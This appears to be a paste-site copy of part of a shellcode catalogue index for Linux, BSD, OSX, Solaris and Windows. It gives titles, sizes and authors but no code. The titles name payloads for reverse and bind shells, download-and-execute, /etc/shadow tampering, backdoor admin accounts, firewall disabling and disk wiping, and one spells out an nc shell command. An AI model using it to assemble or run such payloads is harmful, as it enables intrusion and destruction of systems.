  490. Linux/x86 - execve(/sbin/shutdown,/sbin/shutdown 0) - 36 bytes by TheWorm
  491. Linux/x86 - exit(0) 3 bytes or exit(1) 4 bytes by TheWorm
  492. Linux/x86 - setuid(0) & execve(/bin/sh,0) - 25 bytes by TheWorm
  493. Linux/x86 - setuid(0), setgid(0) & execve(/bin/sh,[/bin/sh,NULL]) - 33 bytes by TheWorm
  494. Linux/x86 - System Beep - 45 bytes by Thomas Rinsma
  495. Linux/x86 - Bindshell TCP/5074 - 226 bytes by Tora
  496. Linux/x86 - iptables -F - 45 bytes by UnboundeD
  497. Linux/x86 - Connect-Back port UDP/54321 - 151 bytes by XenoMuta
  498. Linux/x86 - append rsa key to /root/.ssh/authorized_keys2 - 295 bytes by XenoMuta
  499. Linux/x86 - listens for shellcode on tcp/5555 and jumps to it - 83 bytes by XenoMuta
  500. Linux/x86 - Self-modifying ShellCode for IDS evasion - 64 bytes by Xenomuta
  501. Linux/x86 - shellcode that forks a HTTP Server on port tcp/8800 - 166 bytes by Xenomuta
  502. Linux/x86 - stagger that reads second stage shellcode (127 bytes maximum) from stdin - 14 bytes by _fkz
  503. Linux/x86 - alphanumeric Bomb FORK Shellcode - 117 Bytes by agix
  504. Linux/x86 - chmod(/etc/shadow, 0666) ASCII - 443 bytes by agix
  505. Linux/x86 - pwrite(/etc/shadow, hash, 32, 8) - 89 Bytes by agix
  506. Linux/x86 - Polymorphic - setuid(0) + chmod(/etc/shadow, 0666) - 61 Bytes by antrhacks
  507. Linux/x86 - execve(/bin/cat, /etc/shadow, NULL) - 42 bytes by antrhacks
  508. Linux/x86 - setuid(0) + chmod(/etc/shadow, 0666) - 37 Bytes by antrhacks
  509. Linux/x86 - setreuid(geteuid(),geteuid()),execve(/bin/sh,0,0) - 34bytes by blue9057
  510. Linux/x86 - /bin/sh sysenter Opcode Array Payload - 23 Bytes by c0ntex & BaCkSpAcE
  511. Linux/x86 - File Reader /etc/passwd - 65 bytes by certaindeath
  512. Linux/x86 - sends Phuck3d! to all terminals - 60 bytes by condis
  513. Linux/x86 - upload & exec - 189 bytes by cybertronic
  514. Linux/x86 - File unlinker 18 bytes + file path length by darkjoker
  515. Linux/x86 - Perl script execution 99 bytes + script length by darkjoker
  516. Linux/x86 - back-connect TCP/2222 - 93 bytes by dev0id
  517. Linux/x86 - iptables -F - 58 bytes by dev0id
  518. Linux/x86 - symlink /bin/sh xoring - 56 bytes by dev0id
  519. Linux/x86 - iopl(3); asm(cli); while(1){} - 12 bytes by dun
  520. Linux/x86 - SWAP restore - 109 bytes by dx & spud
  521. Linux/x86 - SWAP store - 99 bytes by dx & spud
  522. Linux/x86 - /sbin/iptables --flush - 69 bytes by eSDee [Netric .org]
  523. Linux/x86 - connect back shellcode (port=0xb0ef) - 131 bytes by eSDee [Netric .org]
  524. Linux/x86 - forking portbind shellcode - port=0xb0ef(45295) - 200 bytes by eSDee [Netric .org]
  525. Linux/x86 - Linux x86 setreuid(0,0) execve(/bin/zsh, [/bin/zsh, NULL]) + XOR - 53 bytes by egeektronic
  526. Linux/x86 - setreuid(0,0) execve("/bin/csh", [/bin/csh, NULL]) + XOR - 53 bytes by egeektronic
  527. Linux/x86 - setreuid(0,0) execve("/bin/ksh", [/bin/ksh, NULL]) + XOR - 53 bytes by egeektronic
  528. Linux/x86 - setreuid(0,0) execve(/bin/ash,NULL,NULL) + XOR - 58 bytes by egeektronic
  529. Linux/x86 - bin/cat /etc/passwd - 43 bytes by fb1h2s
  530. Linux/x86 - execve() - 51bytes by fl0 fl0w
  531. Linux/x86 - Find all writeable folder in filesystem linux polymorphic shellcode by gunslinger_
  532. Linux/x86 - Polymorphic bindport to 13123 - 125 bytes by gunslinger_
  533. Linux/x86 - Polymorphic bindport to 31337 with setreuid (0,0) - 131 bytes by gunslinger_
  534. Linux/x86 - bind port to 6678 XOR encoded polymorphic - 125 bytes by gunslinger_
  535. Linux/x86 - cdrom ejecting shellcode - 46 bytes by gunslinger_
  536. Linux/x86 - chown root:root /bin/sh - 48 bytes by gunslinger_
  537. Linux/x86 - force unmount /media/disk - 33 bytes by gunslinger_
  538. Linux/x86 - give all user root access when execute /bin/sh - 45 bytes by gunslinger_
  539. Linux/x86 - hard reboot (without any message) and data not lost - 33 bytes by gunslinger_
  540. Linux/x86 - hard reboot (without any message) and data will be lost - 29 bytes by gunslinger_
  541. Linux/x86 - nc -lp 31337 -e /bin//sh polymorphic - 91 bytes by gunslinger_
  542. Linux/x86 - polymorphic cdrom ejecting - 74 bytes by gunslinger_
  543. Linux/x86 - setdomainname to (th1s s3rv3r h4s b33n h1j4ck3d !!) by gunslinger_
  544. Linux/x86 - sys_chmod(/etc/shadow, 599) - 39 bytes by gunslinger_
  545. Linux/x86 - sys_execve(/bin/sh, -c, ping localhost) - 55 bytes by gunslinger_
  546. Linux/x86 - sys_exit(0) - 8 bytes by gunslinger_
  547. Linux/x86 - sys_kill(-1,9) - 11 bytes by gunslinger_
  548. Linux/x86 - sys_rmdir(/tmp/willdeleted) - 41 bytes by gunslinger_
  549. Linux/x86 - sys_sethostname(PwNeD !!, 8) - 32 bytes by gunslinger_
  550. Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (/bin/sh) - 39 bytes by gunslinger_
  551. Linux/x86 - sys_sync - 6 bytes by gunslinger_
  552. Linux/x86 - unlink /etc/shadow - 33 bytes by gunslinger_
  553. Linux/x86 - Reverse Telnet by hts
  554. Linux/x86 - execve /bin/sh - 21 bytes by ipv
  555. Linux/x86 - HTTP/1.x GET, Downloads & execve() - 111 bytes+ by izik
  556. Linux/x86 - HTTP/1.x GET, Downloads and JMP - 68 bytes+ by izik
  557. Linux/x86 - anti-debug trick (INT 3h trap) execve(/bin/sh, [/bin/sh, NULL], NULL) - 39 bytes by izik
  558. Linux/x86 - cat /dev/urandom > /dev/console, no real profit just for kicks - 63 bytes by izik
  559. Linux/x86 - eject & close cd-rom frenzy loop (follows /dev/cdrom symlink) - 45 bytes by izik
  560. Linux/x86 - execve /bin/sh xored for Intel x86 CPUID 41 bytes by izik
  561. Linux/x86 - execve(/bin/sh, [/bin/sh, NULL]) + Bitmap - 27 bytes by izik
  562. Linux/x86 - execve(/bin/sh, [/bin/sh, NULL]) + RIFF Header - 28 bytes by izik
  563. Linux/x86 - execve(/bin/sh, [/bin/sh, NULL]) + RTF header - 30 bytes by izik
  564. Linux/x86 - execve(/bin/sh, [/bin/sh, NULL]) + ZIP Header - 28 bytes by izik
  565. Linux/x86 - execve(/bin/sh, [/bin/sh], NULL) / encoded by +1 - 39 bytes by izik
  566. Linux/x86 - open cd-rom loop (follows /dev/cdrom symlink) - 39 bytes by izik
  567. Linux/x86 - quick (yet conditional, eax != 0 and edx == 0) exit - 4 bytes by izik
  568. Linux/x86 - chmod(/etc/shadow, 0666) & exit() - 33 bytes by ka0x
  569. Linux/x86 - setuid(0) & execve(/bin/cat /etc/shadow) - 49 bytes by ka0x
  570. Linux/x86 - setuid(0) & execve(/sbin/poweroff -f) - 47 bytes by ka0x
  571. Linux/x86 - execve (/bin/sh) - 21 Bytes by kernel_panik
  572. Linux/x86 - Bindport TCP/3879 by lamagra
  573. Linux/x86 - connect back, download a file and execute - 149 bytes by militan
  574. Linux/x86 - raw-socket ICMP/checksum shell - 235 bytes by mu-b
  575. Linux/x86 - hence dropping a SUID root shell in /tmp - 126 bytes by n/a
  576. Linux/x86 - kill snort - 151 bytes by nob0dy
  577. Linux/x86 - setreuid & execve - 31 bytes by oc192
  578. Linux/x86 - rm -rf / which attempts to block the process from being stopped - 132 bytes by onionring
  579. Linux/x86 - portbind (define your own port) - 84 bytes by oveRet
  580. Linux/x86 - setuid(0)+setgid(0)+add user iph without password - 124 bytes by pentesters.ir
  581. Linux/x86 - break chroot execve /bin/sh - 80 bytes by preedator
  582. Linux/x86 - chroot()/execve() code by preedator
  583. Linux/x86 - Search php,html writable files and add your code - 380+ bytes by rigan
  584. Linux/x86 - chmod 666 /etc/shadow - 27 bytes by root@thegibson
  585. Linux/x86 - eject /dev/cdrom - 42 bytes by root@thegibson
  586. Linux/x86 - kill all processes - 9 bytes by root@thegibson
  587. Linux/x86 - overwrite MBR on /dev/sda with LOL! - 43 bytes by root@thegibson
  588. Linux/x86 - execve(/bin/sh,0,0) - 21 bytes by sToRm
  589. Linux/x86 - portbind /bin/sh (port 64713) - 83 bytes by sToRm
  590. Linux/x86 - setuid(0) & execve(/bin/sh,0,0) - 28 bytes by sToRm
  591. Linux/x86 - setresuid(0,0,0); execve /bin/sh; exit; - 41 bytes by sacrine
  592. Linux/x86 - setuid(0) & execve(/bin/sh,0,0) - 28 bytes by sch3m4
  593. Linux/x86 - disabled modsecurity - 64 bytes by sekfault
  594. Linux/x86 - shared memory exec - 50 bytes by sloth
  595. Linux/x86 - chmod(/etc/shadow, 0777) - 33 bytes by sm0k
  596. Linux/x86 - setresuid(0,0,0)-/bin/sh - 35 bytes by sorrow
  597. Linux/x86 - Add User USER=t00r PASS=t00r - Encoder PexFnstenvSub - 116 bytes by vlad902
  598. Linux/x86 - disables shadowing - 42 bytes by vlan7
  599. Linux/x86 - setuid() & execve() - 27 bytes by vlan7
  600. Linux/x86 - examples of long-term payloads hide-wait-change - 187 bytes+ by xort & izik
  601. Linux/x86 - Alpha-Numeric using IMUL Method - 88 bytes by xort
  602. Linux/x86 - Magic Byte Self Modifying Code for surviving - execve() _exit() - 76 bytes by xort
  603. Linux/x86 - Radically Self Modifying Code - execve & _exit() - 70 bytes by xort
  604. Linux/x86 - alpha-numeric - 64 bytes by xort
  605. Linux/x86 - examples of long-term payloads hide-wait-change (.s) by xort
  606. Linux/x86 - add a passwordless local root account w000t - 177 bytes by zillion
  607. Linux/x86 - execve of /bin/sh /tmp/p00p - 70 bytes by zillion
  608. Linux/x86 - execve of /sbin/ipchains -F - 70 bytes by zillion
  609. Linux/x86 - execve() of /sbin/iptables -F - 70 bytes by zillion
  610. Linux/x86 - mkdir() & exit() - 36 bytes by zillion
  611. NetBSD
  612.  
  613. NetBSD/x86 - kill all processes shellcode - 23 bytes by Anonymous
  614. NetBSD/x86 - execve(/bin/sh) - 68 bytes by humble
  615. NetBSD/x86 - callback (port 6666) - 83 bytes by minervini
  616. NetBSD/x86 - setreuid(0, 0); execve(/bin//sh, ..., NULL); - 29 bytes by minervini
  617. OpenBSD
  618.  
  619. OpenBSD/x86 - reboot() - 15 bytes by beosroot
  620. OpenBSD/x86 - execve(/bin/sh) - 23 bytes by hophet
  621. OpenBSD/x86 - add user w00w00 - 112 bytes by n/a
  622. OpenBSD/x86 - portbind port 6969 - 148 bytes by noir
  623. OSX
  624.  
  625. PPC
  626. Osx/ppc - Add user r00t - 219 bytes by B-r00t
  627. Osx/ppc - add inetd backdoor - 222 bytes by B-r00t
  628. Osx/ppc - create /tmp/suid - 122 bytes by B-r00t
  629. Osx/ppc - remote findsock by recv() key shellcode by Dino Dai Zovi
  630. Osx/ppc - Single Reverse TCP by H D Moore
  631. Osx/ppc - stager sock find peek by H D Moore
  632. Osx/ppc - stager sock find by H D Moore
  633. Osx/ppc - stager sock reverse by H D Moore
  634. Osx/ppc - Bind Shell PORT TCP/8000 - encoder OSXPPCLongXOR - 300 bytes by H D moore
  635. Osx/ppc - shellcode execve(/bin/sh) by ghandi
  636. Osx/ppc - execve(/bin/sh,[/bin/sh],NULL)& exit() - 72 bytes by haphet
  637. Osx/ppc - sync(), reboot() - 32 bytes by haphet
  638. Intel x86-64
  639. Osx/x86-64 - setuid shell x86_64 - 51 bytes by Dustin Schultz
  640. Osx/x86-64 - reverse tcp shellcode - 131 bytes by Jacob Hammack
  641. Osx/x86-64 - universal ROP shellcode by P. Kot
  642. Osx/x86-64 - universal OSX dyld ROP shellcode by pa_kt
  643. Intel x86
  644. Osx/x86 - execve(/bin/sh) - 24 byte by Simon Derouineau
  645. Solaris
  646.  
  647. MIPS
  648. Solaris/mips - connect-back (with XNOR encoded session) - 600 bytes by Russell Sanford
  649. Solaris/mips - download and execute - 278 bytes by Russell Sanford
  650. SPARC
  651. Solaris/sparc - setreuid(geteuid()), setregid(getegid()), execve /bin/sh by Claes M. Nyberg
  652. Solaris/sparc - Bind /bin/sh TCP port 2001 by ghandi
  653. Solaris/sparc - portbind | port 6666 - 240 bytes by lhall
  654. Solaris/sparc - setreuid - 56 bytes by lhall
  655. Solaris/sparc - execve(/bin/sh) - 52 bytes by n/a
  656. Solaris/sparc - Single bind TCP shell by vlad902
  657. Intel x86
  658. Solaris/x86 - setuid(0) /bin/cat //etc/shadow - 61 by John Babio
  659. Solaris/x86 - Halt shellcode - 36 bytes by Jonathan Salwan
  660. Solaris/x86 - Reboot() - 37 bytes by Jonathan Salwan
  661. Solaris/x86 - Remote Download file - 79 bytes by Jonathan Salwan
  662. Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes by Jonathan Salwan
  663. Solaris/x86 - SystemV killall command - 39 bytes by Jonathan Salwan
  664. Solaris/x86 - execve(/bin/sh, /bin/sh, NULL) - 27 bytes by Jonathan Salwan
  665. Solaris/x86 - add services and execve inetd - 201 bytes by n/a
  666. Solaris/x86 - execve /bin/sh toupper evasion - 84 bytes by n/a
  667. Solaris/x86 - execve /bin/sh - 43 bytes by shellcode.com.ar
  668. Solaris/x86 - setuid(0)&execve(//bin/sh)&exit(0) - 39 bytes by sm4x
  669. Solaris/x86 - setuid(0)&execve(/bin/cat, /etc/shadow)&exit(0) - 59 bytes by sm4x
  670. Windows
  671.  
  672. Windows-64 - Obfuscated Shellcode x86/x64 Download And Execute [Use PowerShell] - Generator by Ali Razmjoo
  673. Windows-64 - Add Admin, enable RDP, stop firewall and start terminal service - 1218 bytes by Ali Razmjoo
  674. Windows - Add Admin, enable RDP, stop firewall and start terminal service - 1218 bytes by Ali Razmjoo
  675. Windows - Add Admin User Shellcode - 194 bytes by Giuseppe D'Amore
  676. Windows-64 - (URLDownloadToFileA) download and execute - 218+ bytes by Weiss
  677. Windows-64 - Windows Seven x64 (cmd) - 61 bytes by agix
  678. Windows - Safari JS JITed shellcode - exec calc (ASLR/DEP bypass) by Alexey Sintsov
  679. Windows - Vista/7/2008 - download and execute file via reverse DNS channel by Alexey Sintsov
  680. Windows - sp2 (En + Ar) cmd.exe - 23 bytes by AnTi SeCuRe
  681. Windows - add new local administrator - 326 bytes by Anastasios Monachos
  682. Windows - pro sp3 (EN) - add new local administrator 113 bytes by Anastasios Monachos
  683. Windows - xp sp2 PEB ISbeingdebugged shellcode - 56 bytes by Anonymous
  684. Windows - XP Pro Sp2 English Message-Box Shellcode - 16 Bytes by Aodrulez
  685. Windows - XP Pro Sp2 English Wordpad Shellcode - 15 bytes by Aodrulez
  686. Windows - Write-to-file Shellcode by Brett Gervasoni
  687. Windows - telnetbind by winexec - 111 bytes by DATA_SNIPER
  688. Windows - useradd shellcode for russian systems - 318 bytes by Darkeagle
  689. Windows - XP SP3 English MessageBoxA - 87 bytes by Glafkos Charalambous
  690. Windows - SP2 english ( calc.exe ) - 37 bytes by Hazem mofeed
  691. Windows - SP3 english ( calc.exe ) - 37 bytes by Hazem mofeed
  692. Windows - Shellcode (cmd.exe) for XP SP2 Turkish - 26 Bytes by Hellcode
  693. Windows - Shellcode (cmd.exe) for XP SP3 English - 26 Bytes by Hellcode
  694. Windows - XP SP3 EN Calc Shellcode - 16 Bytes by John Leitch
  695. Windows - win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode - 112 bytes by KaHPeSeSe
  696. Windows - win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode - 112 bytes by KaHPeSeSe
  697. Windows - PEB Kernel32.dll ImageBase Finder - 49 Bytes by Koshi
  698. Windows - PEB Kernel32.dll ImageBase Finder Alphanumeric - 67 bytes by Koshi
  699. Windows - PEB!NtGlobalFlags shellcode - 14 bytes by Koshi
  700. Windows - XP sp3 (Ru) WinExec+ExitProcess cmd shellcode - 12 bytes by Lord Kelvin
  701. Windows - Reverse Generic Shellcode w/o Loader - 249 bytes by Matthieu Suiche
  702. Windows - Pop up message box (XP/SP2) - 110 bytes by Omega7
  703. Windows - sp3 (FR) Sleep - 14 bytes by Optix
  704. Windows - XP download and exec source by Peter Winter-Smith
  705. Windows - Allwin MessageBoxA - 238 bytes by RubberDuck
  706. Windows - Allwin WinExec add new local administrator + ExitProcess Shellcode - 272 bytes by RubberDuck
  707. Windows - Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes by RubberDuck
  708. Windows - Shellcode Collection - (calc) 19 bytes by SkuLL-HacKeR
  709. Windows - null-free 32-bit Windows download and LoadLibrary shellcode - 164 bytes by SkyLined
  710. Windows - null-free 32-bit Windows shellcode that executes calc.exe - 100 bytes by SkyLined
  711. Windows - null-free 32-bit Windows shellcode that shows a message box - 140 bytes by SkyLined
  712. Windows - null-free bindshell for Windows 5.0-6.0 all service packs by SkyLined
  713. Windows - XP sp2 (FR) Sellcode cmd.exe - 32 bytes by Stack
  714. Windows - XP/sp2 (EN) cmd.exe - 23 bytes by Stack
  715. Windows - XP Professional SP2 ita calc.exe - 36 bytes by Stoke
  716. Windows - WinExec() Command Parameter - 104 bytes by Weiss
  717. Windows - download and execute - 124 bytes by Weiss
  718. Windows - Download and Execute Shellcode Generator by YAG KOHHA
  719. Windows - sp3 (Tr) Add Admin Account Shellcode - 127 bytes by ZoRLu
  720. Windows - sp3 (Tr) MessageBoxA Shellcode - 109 bytes by ZoRLu
  721. Windows - sp3 (Tr) calc.exe Shellcode 53 bytes by ZoRLu
  722. Windows - sp3 (Tr) cmd.exe Shellcode - 42 bytes by ZoRLu
  723. Windows - sp3 (Tr) cmd.exe Shellcode 52 bytes by ZoRLu
  724. Windows - Xp Pro SP3 Fr (calc.exe) - 31 Bytes by agix
  725. Windows - XP PRO SP3 - Full ROP calc shellcode by b33f
  726. Windows - xp pro sp3 (calc) - 57 bytes by cr4wl3r
  727. Windows - win32/xp pro sp3 MessageBox shellcode - 11 bytes by d3c0der
  728. Windows - download & exec shellcode - 226 bytes+ by darkeagle
  729. Windows - Shellcode Checksum Routine by dijital1
  730. Windows - IsDebuggerPresent ShellCode (NT/XP) - 39 bytes by ex-pb
  731. Windows - IsDebuggerPresent ShellCode (NT/XP) - 39 bytes by ex-pb
  732. Windows - PEB method (9x/NT/2k/XP) - 29 bytes by loco
  733. Windows - connectback, receive, save and execute shellcode by loco
  734. Windows - Bind Shell (NT/XP/2000/2003) - 356 bytes by metasploit
  735. Windows - Create Admin User Account (NT/XP/2000) - 304 bytes by metasploit
  736. Windows - Vampiric Import Reverse Connect - 179 bytes by metasploit
  737. Windows - PEB method (9x/NT/2k/XP) by oc192
  738. Windows - eggsearch shellcode - 33 bytes by oxff
  739. Windows - XP-sp1 portshell on port 58821 - 116 bytes by silicon
  740. Windows - XP SP3 addFirewallRule by sinn3r
  741. Windows - PEB method (9x/NT/2k/XP) - 31 bytes by twoci
  742. Windows - Beep Shellcode (SP1/SP2) - 35 bytes by xnull
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement